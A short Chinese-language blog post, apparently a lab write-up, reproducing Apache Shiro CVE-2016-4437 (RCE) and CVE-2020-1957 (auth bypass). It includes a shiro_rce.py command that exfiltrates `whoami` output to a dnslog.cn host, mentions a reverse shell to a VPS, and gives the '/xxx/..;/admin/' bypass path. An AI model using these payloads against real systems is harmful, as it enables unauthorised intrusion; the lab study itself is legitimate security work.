Apache Shiro
前言 :
進行內網滲透時,Shiro 服務也滿常見到的,是不錯下手的一個點,後來找找 PoC 自己嘗試復現一次漏洞,挺好玩的。
內文 :
影響範圍(CVE-2016-4437)
Apache Shiro <= 1.2.4
實作環境
Victim : 192.168.235.128 , kali
Attack : 192.168.235.158 , windows 10
利用 DNSLog 去接收是否資訊。
python shiro_rce.py http://192.168.235.128:8080/login "ping `whoami`.ssngky.dnslog.cn"
成功將 RCE,將 root 用戶帶到 DNSLog.cn 上。
或利用圖形化工具 ShiroExploit.jar 進行利用。
因為不會回顯,所以可以採反彈 shell 的方式去執行(測試用的vpsip,已刪除)。
成功將 shell 彈到 vps 上面。
CVE-2020-1957(認證繞過漏洞)
影響範圍
Apache Shiro < 1.5.1
客戶端請求 /admin 後台路徑。
PoC。
/xxx/..;/admin/
Reference :
https://github.com/fupinglee/ShiroScan (GUI圖形化)
https://github.com/sv3nbeast/ShiroScan
https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2020-1957
留言
張貼留言